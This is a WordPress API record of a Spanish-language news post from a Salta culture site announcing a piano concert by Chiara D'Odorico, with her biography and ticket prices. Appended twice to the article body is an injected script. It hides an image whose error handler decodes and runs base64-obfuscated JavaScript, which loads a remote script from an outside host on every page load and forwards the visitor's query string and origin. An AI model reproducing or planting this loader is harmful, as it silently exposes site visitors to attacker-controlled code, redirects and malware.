{"id":3085,"date":"2023-09-08T09:45:47","date_gmt":"2023-09-08T12:45:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3085"},"modified":"2025-08-14T00:08:45","modified_gmt":"2025-08-14T03:08:45","slug":"la-pianista-chiara-dodorico-brindara-un-concierto-este-viernes-en-pro-cultura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3085","title":{"rendered":"La pianista Chiara D\u2019Odorico brindar\u00e1 un concierto este viernes en Pro Cultura"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7b0536\"><em>\u201cM\u00fasica paraguaya acad\u00e9mica para piano\u201d es la propuesta de la instituci\u00f3n para pasar una velada internacional en Mitre 331. Actividad con costo.<\/em><\/h3>\n\n\n\n<p>Este viernes 8 de septiembre la pianista paraguaya Chiara D\u2019Odorico presentar\u00e1 en Salta el concierto \u201cM\u00fasica paraguaya acad\u00e9mica para piano\u201d. El pianista argentino David Lonardi, ser\u00e1 el invitado para acompa\u00f1ar la presentaci\u00f3n.<\/p>\n\n\n\n<p>Chiara D\u2019Odorico naci\u00f3 en Asunci\u00f3n y comenz\u00f3 a estudiar piano a los cuatro a\u00f1os con su madre, Miriam de D\u2019Odorico, continu\u00f3 su formaci\u00f3n con grandes maestros como Bruno Gelber y Manuel Massone en Argentina y en Europa con Pierre Reach, Denis Lossev, entre otros.<\/p>\n\n\n\n<p>Es considerada una de las pianistas paraguayas con mayor reconocimiento a nivel internacional. Distinguida con distintos premios que realzan su carrera art\u00edstica como \u00abEmbajadora Tur\u00edstica del Paraguay\u00bb, \u201cPremio Art\u00edfices del Cambio: Mujeres que Innovan y Crean\u201d, \u201cJoven Sobresaliente del Paraguay y \u201cPremio Nacional de la Juventud\u201d entregado por el Presidente de la Rep\u00fablica. Desarrolla una intensa actividad musical present\u00e1ndose regularmente en distintos pa\u00edses como solista y con orquesta. Ha visitado m\u00e1s de treinta pa\u00edses como: Brasil, Ecuador, Estados Unidos, Canad\u00e1, Italia, Francia, Espa\u00f1a, Austria, Inglaterra, Rusia, Sud\u00e1frica, L\u00edbano e India.<\/p>\n\n\n\n<p>La artista cuenta con dos materiales discogr\u00e1ficos, \u201cPurah\u00e9i che ret\u00e3gua\u201d (nominado a los Premios Gardel 2020 como Mejor \u00c1lbum de M\u00fasica Cl\u00e1sica) y \u201cOfrenda a mi tierra\u201d con el objetivo de difundir la m\u00fasica acad\u00e9mica paraguaya. Es M\u00e1ster en Interpretaci\u00f3n Musical, graduada en la Escuela Superior de M\u00fasica de Catalu\u00f1a (Barcelona, Espa\u00f1a).<\/p>\n\n\n\n<p>La reserva de entradas se realiza por el siguiente Formulario en l\u00ednea&nbsp;<a href=\"https:\/\/forms.gle\/SNQbmcd63Jniqkjc7\">https:\/\/forms.gle\/SNQbmcd63Jniqkjc7<\/a>.<\/p>\n\n\n\n<p>El costo de la entrada en puerta ser\u00e1 de $2000 y su reserva previa tendr\u00e1 un valor de $1500.<\/p>\n\n\n\n<p>Pro Cultura Salta es una Asociaci\u00f3n civil sin fines de lucro, que se mantiene a trav\u00e9s de la colaboraci\u00f3n de socios institucionales, socios individuales, socios adherentes, socios fundadores y socios honorarios, m\u00e1s el aporte econ\u00f3mico de empresas que auspician los eventos organizados por la instituci\u00f3n. Su finalidad es la de propender a la elevaci\u00f3n y desarrollo del nivel cultural de la poblaci\u00f3n de la Provincia.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-pianista-chiara-dodorico-brindara-un-concierto-este-viernes-en-pro-cultura-91727\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cM\u00fasica paraguaya acad\u00e9mica para piano\u201d es la propuesta de la instituci\u00f3n para pasar una velada internacional en Mitre 331. Actividad con costo. Este viernes 8 de septiembre la pianista paraguaya Chiara D\u2019Odorico presentar\u00e1 en Salta el concierto \u201cM\u00fasica paraguaya acad\u00e9mica para piano\u201d. El pianista argentino David Lonardi, ser\u00e1 el invitado para acompa\u00f1ar la presentaci\u00f3n. Chiara [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3086,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3085","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3085"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3085"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3085\/revisions"}],"predecessor-version":[{"id":6968,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3085\/revisions\/6968"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3086"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}